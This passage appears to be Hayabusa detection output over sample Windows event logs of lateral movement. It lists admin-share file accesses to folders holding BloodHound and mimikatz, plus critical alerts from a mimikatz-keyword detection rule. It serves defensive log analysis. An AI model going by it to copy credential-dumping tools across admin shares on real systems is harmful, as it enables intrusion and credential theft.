+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.569 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.579 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user02\Saved Games\desktop.ini : IP Address: 